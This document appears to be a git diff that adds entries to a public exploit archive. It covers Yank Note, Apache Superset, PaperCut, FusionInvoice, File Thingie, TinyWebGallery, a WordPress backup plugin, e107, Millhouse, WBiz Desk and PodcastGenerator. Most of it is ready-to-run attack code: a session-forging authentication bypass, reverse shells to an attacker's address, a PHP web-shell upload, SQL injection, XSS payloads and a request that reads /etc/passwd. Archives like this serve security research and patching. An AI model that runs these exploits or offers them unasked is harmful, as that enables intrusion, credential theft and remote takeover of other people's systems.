+# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-27
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31874
+# Vendor Homepage: yank-note.com
+# Software Link: https://github.com/purocean/yn
+# Version: 3.52.1
+# Tested on: [Ubuntu 22.04 | Mac OS 13]
+
+Release Date: 2023-04-27
+
+Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
+
+Technical Details & Description:
+
+A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload.
+Mac:
+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
+
+Ubuntu:
+<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
+
+Opening the file in Yank Note will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51447.py b/exploits/multiple/webapps/51447.py
new file mode 100755
index 000000000..6487a690c
--- /dev/null
+++ b/exploits/multiple/webapps/51447.py
@@ -0,0 +1,105 @@
+# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
+# Date: 10 May 2023
+# Exploit Author: MaanVader
+# Vendor Homepage: https://superset.apache.org/
+# Version: Apache Superset<= 2.0.1
+# Tested on: 2.0.0
+# CVE: CVE-2023-27524
+
+from flask_unsign import session
+import requests
+import urllib3
+import argparse
+import re
+from time import sleep
+from selenium import webdriver
+from urllib.parse import urlparse
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+SECRET_KEYS = [
+    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
+    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
+    b'thisISaSECRET_1234',                            # deployment template
+    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
+    b'TEST_NON_DEV_SECRET'                            # docker compose
+]
+
+def main():
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
+    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
+    args = parser.parse_args()
+
+    try:
+        u = args.url.rstrip('/') + '/login/'
+
+        headers = {
+            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
+        }
+
+        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
+        if resp.status_code != 200:
+            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
+            return
+
+        session_cookie = None
+        for c in resp.cookies:
+            if c.name == 'session':
+                session_cookie = c.value
+                break
+
+        if not session_cookie:
+            print('Error: No session cookie found')
+            return
+
+        print(f'Got session cookie: {session_cookie}')
+
+        try:
+            decoded = session.decode(session_cookie)
+            print(f'Decoded session cookie: {decoded}')
+        except:
+            print('Error: Not a Flask session cookie')
+            return
+
+        match = re.search(r'"version_string": "(.*?)&#34', resp.text)
+        if match:
+            version = match.group(1)
+        else:
+            version = 'Unknown'
+
+        print(f'Superset Version: {version}')
+
+
+        for i, k in enumerate(SECRET_KEYS):
+            cracked = session.verify(session_cookie, k)
+            if cracked:
+                break
+
+        if not cracked:
+            print('Failed to crack session cookie')
+            return
+
+        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
+
+        try:
+            user_id = int(args.id)
+        except:
+            user_id = args.id
+
+        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
+        print(f'Forged session cookie for user {user_id}: {forged_cookie}')
+        u1 = args.url.rstrip('/') + '/superset/welcome'
+
+        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
+
+
+
+
+    except Exception as e:
+        print(f'Unexpected error: {e}')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51452.py b/exploits/multiple/webapps/51452.py
new file mode 100755
index 000000000..9960e75bc
--- /dev/null
+++ b/exploits/multiple/webapps/51452.py
@@ -0,0 +1,115 @@
+# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
+# Date: 13 May 2023
+# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
+# Vendor Homepage: https://www.papercut.com/
+# Version: 8.0 or later
+# Tested on: 22.0.4
+# CVE: CVE-2023-27350
+
+
+import requests
+import argparse
+
+Group_payload = {
+    "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form",
+    "sp":"S0",
+    "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5",
+    "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d",
+    "$Hidden$0":"F",
+    "$Hidden$1":"F",
+    "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.",
+    "$Hidden$3":"F",
+    "$Hidden$4":"X",
+    "$Hidden$5":"X",
+    "$Hidden$6":"X",
+    "$Hidden$7":"X",
+    "$Hidden$8":"X",
+    "$Hidden$9":"X",
+    "$Hidden$10":"X",
+    "$Hidden$11":"X",
+    "$Hidden$12":"X",
+    "$Hidden$13":"F",
+    "$Hidden$14":"X",
+    "$Hidden$15":"F",
+    "$Hidden$16":"S",
+    "$Hidden$17":"S",
+    "$Hidden$18":"S",
+    "$Hidden$19":"S",
+    "$Hidden$20":"F",
+    "$Hidden$21":"SSTANDARD_UNIX",
+    "$PropertySelection":"3,CUSTOM",
+    "$TextField":"/usr/bin/python3",
+    "$TextField$0":"/usr/bin/python3",
+    "$RadioGroup":"0",
+    "primaryCardIdLength":"8",
+    "secondaryCardIdLength":"8",
+    "$PropertySelection$4":"0,STANDARD_UNIX",
+    "$TextField$13":"",
+    "$TextField$14":"",
+    "$TextField$15":"",
+    "$TextField$16":"",
+    "$RadioGroup$0":"0",
+    "$PropertySelection$5":"NONE",
+    "$TextField$17":"",
+    "$PropertySelection$6":"NONE",
+    "$TextField$18":"employeeNumber",
+    "primaryCardId2Length":"8",
+    "$PropertySelection$7":"NONE",
+    "$TextField$19":"",
+    "secondaryCardId2Length":"8",
+    "$TextField$20":"",
+    "$Submit$4":"Apply"
+
+}
+
+
+parser = argparse.ArgumentParser(description="Papercut RCE")
+parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
+parser.add_argument('--ip',help='our rev shell ip')
+parser.add_argument('--port',help='our rev shell port')
+args = parser.parse_args()
+
+url = args.url
+ip = args.ip
+port = args.port
+
+passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")"
+
+final_payload = {
+    "service":"direct/1/Home/$Form$0",
+    "sp":"S0",
+    "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0",
+    "$Hidden$0":"true",
+    "$Hidden$1":"X",
+    "inputUsername":"help",
+    "inputPassword":passwd_input,
+    "$PropertySelection$0":"en",
+    "$Submit$0":"Log+in"
+}
+
+# create a session
+session = requests.Session()
+
+# visit the first URL to set up the session
+setup_url = url+"/app?service=page/SetupCompleted"
+response = session.get(setup_url)
+response.raise_for_status()  # check for any errors
+
+# visit the second URL using the same session
+dashboard_url = url+"/app?service=page/Dashboard"
+response = session.get(dashboard_url)
+response.raise_for_status()  # check for any errors
+
+# URL to change user group
+user_group_change_url = url+"/app"
+response = session.post(user_group_change_url,data=Group_payload)
+response.raise_for_status() # check for errors
+
+# URL to gain RCE
+rce_url = url+"/app"
+response = session.post(rce_url,data=final_payload)
+response.raise_for_status() # Check for any errors
+
+
+# print the response text
+print(response.text)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51480.txt b/exploits/multiple/webapps/51480.txt
new file mode 100644
index 000000000..216798d0c
--- /dev/null
+++ b/exploits/multiple/webapps/51480.txt
@@ -0,0 +1,30 @@
+# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
+# Date: 2023-05-24
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.squarepiginteractive.com
+# Software Link: https://www.fusioninvoice.com/store
+# Version: 2023-1.0
+# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
+# CVE: CVE-2023-25439
+
+Description:
+
+A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to
+execute arbitrary web scripts or HTML.
+
+Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and
+possibly others) it will be triggered once page gets loaded.
+
+
+Steps to reproduce:
+
+- Click on "Expenses", or "Tasks" and add (or edit an existing) one,
+- Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"),
+- Click on 'Save'.
+
+Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed.
+
+
+PoC Screenshots:
+
+https://imagebin.ca/v/7FOZfztkDs3I
\ No newline at end of file
diff --git a/exploits/php/webapps/51436.py b/exploits/php/webapps/51436.py
index fbd61ba50..9773f948c 100755
--- a/exploits/php/webapps/51436.py
+++ b/exploits/php/webapps/51436.py
@@ -1,6 +1,6 @@
 #!/usr/bin/python
 
-# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
+# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
 # Google Dork: N/A
 # Date: 27th of April, 2023
 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
@@ -11,7 +11,7 @@
 
 # Vulnerability originally discovered / published by Cakes
 # Reference: https://www.exploit-db.com/exploits/47349
-# Run a local listener on your machine and youre good to go
+# Run a local listener on your machine and you're good to go
 
 
 import os
@@ -44,7 +44,7 @@ class Exploit:
         elif response.status_code == 200:
 
             if "Invalid username or password" in response.text:
-                print(f"Invalid username or password")
+                print(f"[-] Invalid username or password")
                 return False
 
             return True
@@ -74,7 +74,7 @@ class Exploit:
                     print(f"[+] Zipped payload to {self.payload_filename}.zip")
                     return True
         except:
-            print(f"[-] Could not create payload to {self.payload_filename}.zip")
+            print(f"[-] Could not zip payload to {self.payload_filename}.zip")
             return False
 
     def upload_payload(self) -> bool:
@@ -142,7 +142,7 @@ class Exploit:
 
         if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
             print("[+] Unzipping payload successful")
-            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
+            print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
             return True
 
         else:
@@ -150,7 +150,7 @@ class Exploit:
             return False
 
     def execute_payload(self) -> bool:
-        print("[*] Trying the get a reverse shell")
+        print("[*] Trying to get a reverse shell")
 
         cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
         print("[*] Executing payload")
diff --git a/exploits/php/webapps/51443.txt b/exploits/php/webapps/51443.txt
new file mode 100644
index 000000000..8d01794dd
--- /dev/null
+++ b/exploits/php/webapps/51443.txt
@@ -0,0 +1,124 @@
+#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
+#Application: TinyWebGallery
+#Version: v2.5
+#Bugs:  RCE
+#Technology: PHP
+#Vendor URL: http://www.tinywebgallery.com/
+#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
+#Date of found: 07-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+2. upload .phar file
+payload: payload: <?php echo system("cat /etc/passwd"); ?>
+3. go to file link
+
+
+poc request:
+
+
+POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
+Host: localhost
+Content-Length: 2123
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
+Connection: close
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="token"
+
+b2ed5512107a625ef9d5688ced296c61
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2097152
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="confirm"
+
+true
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system("cat /etc/passwd"); ?>
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="userfile[]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgsize"
+
+100000
+------WebKitFormBoundary53rZRhJinqaMm7Ip
+Content-Disposition: form-data; name="twgquality"
+
+80
+------WebKitFormBoundary53rZRhJinqaMm7Ip--
+
+
+
+
+
+http://localhost/twg25/pictures/shell.phar
\ No newline at end of file
diff --git a/exploits/php/webapps/51445.txt b/exploits/php/webapps/51445.txt
new file mode 100644
index 000000000..f483cf49c
--- /dev/null
+++ b/exploits/php/webapps/51445.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
+# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
+# Date: 2023-05-10
+# Exploit Author: Wadeek
+# Vendor Homepage: https://backupbliss.com/
+# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
+# Version: 1.2.8
+# Tested on: WordPress 6.2
+
+1) Get the version of the plugin.
+
+=> GET /wp-content/plugins/backup-backup/readme.txt
+--------------------------------------------------------------------------
+Stable tag: 1.2.8
+--------------------------------------------------------------------------
+
+2) Get the name of the backup directory.
+
+=> GET /wp-content/backup-migration/config.json
+--------------------------------------------------------------------------
+{
+[...],
+"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
+[...],
+"OTHER:EMAIL":"admin@email.com"
+}
+--------------------------------------------------------------------------
+
+3) Get the name of the archive containing the backups.
+
+=> GET /wp-content/backup-migration/complete_logs.log
+--------------------------------------------------------------------------
+BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
+--------------------------------------------------------------------------
+
+4) Build the path for the download.
+
+=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/51449.txt b/exploits/php/webapps/51449.txt
new file mode 100644
index 000000000..a3997fc77
--- /dev/null
+++ b/exploits/php/webapps/51449.txt
@@ -0,0 +1,150 @@
+# Exploit Title: e107 v2.3.2 - Reflected XSS
+# Date: 11/05/2022
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://e107.org/
+# Software Link: https://e107.org/download
+# Version: 2.3.2
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Reflected - unauthorized
+
+URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
+Parameters: content
+
+# POC
+Request:
+POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 1126
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: text/html, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Origin: http://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 11 May 2023 19:38:45 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 1053
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb
+
+### XSS Reflected - Authorized
+
+URL: http://127.0.0.1/e107/e107_admin/image.php
+Parameters: for
+
+# POC 1
+Request:
+GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Connection: close
+
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 04 May 2023 03:07:35 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "37f107dbe6a998ecf7b71689627c2a56"
+Content-Length: 12420
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>Media Manager - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
+	        <p>No HTML5 support.</p>
+		</div>
+[...]
+
+# POC 2
+
+URL: http://127.0.0.1/e107/e107_admin/newspost.php
+Parameters: Payload in URL
+
+Request:
+GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
+Connection: close
+
+Response:
+
+
+
+
+HTTP/1.1 200 OK
+Date: Fri, 05 May 2023 06:21:53 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: e107
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+ETag: "d127dd6a44a22e093fed60b83bf36af2"
+Content-Length: 72914
+Vary: Accept-Encoding
+X-Frame-Options: SAMEORIGIN
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!doctype html>
+<html lang="en">
+<head>
+<title>News - List - Admin Area :: hacked">bbbbb</title>
+<meta charset='utf-8' />
+<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
+<!-- *CSS* -->
+[...]
+<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
+<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/51450.php b/exploits/php/webapps/51450.php
new file mode 100644
index 000000000..a6309f5e5
--- /dev/null
+++ b/exploits/php/webapps/51450.php
@@ -0,0 +1,84 @@
+<?php
+/*
+Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
+Date: 12/05/2023
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
+Software Link: https://github.com/thrsrossi/Millhouse-Project.git
+Version: 1.414
+Tested on: Debian
+CVE: N/A
+*/
+
+
+$options = getopt('u:c:');
+
+if(!isset($options['u'], $options['c']))
+die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
+\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
+\033[0m\n
+\n");
+
+$target     =  $options['u'];
+
+$command    =  $options['c'];
+
+$url = $target . '/includes/add_post_sql.php';
+
+
+$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="title"
+
+helloworld
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="description"
+
+<p>sdsdsds</p>
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="category"
+
+1
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8
+Content-Disposition: form-data; name="image"; filename="rose.php"
+Content-Type: application/x-php
+
+<?php
+$shell = shell_exec("' . $command . '");
+echo $shell;
+?>
+
+------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
+';
+
+$headers = array(
+    'Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
+    'Cookie: PHPSESSID=rose1337',
+);
+
+$ch = curl_init($url);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+$response = curl_exec($ch);
+curl_close($ch);
+
+// execute command
+
+$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
+$ch = curl_init($shell);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$exec_shell = curl_exec($ch);
+curl_close($ch);
+echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
+
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51451.txt b/exploits/php/webapps/51451.txt
new file mode 100644
index 000000000..e8f7ef9c0
--- /dev/null
+++ b/exploits/php/webapps/51451.txt
@@ -0,0 +1,28 @@
+[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
+[#] Exploit Date: May 12, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: WBiz Desk
+[#] Application Version: 1.2
+[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] 3xploit:
+
+[path]//ticket.php?tk=[SQL Injection]
+
+
+[#] 3xample:
+
+[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
+
+
+[#] Notes:
+- The vulnerability requires a non-admin privilege (normal) user to be exploited.
\ No newline at end of file
diff --git a/exploits/php/webapps/51454.txt b/exploits/php/webapps/51454.txt
new file mode 100644
index 000000000..24ad691b7
--- /dev/null
+++ b/exploits/php/webapps/51454.txt
@@ -0,0 +1,184 @@
+#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
+#Application: PodcastGenerator
+#Version: v3.2.9
+#Bugs:  Stored Xss
+#Technology: PHP
+#Vendor URL: https://podcastgenerator.net/
+#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
+#Date of found: 14-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+#########XSS -1##############
+
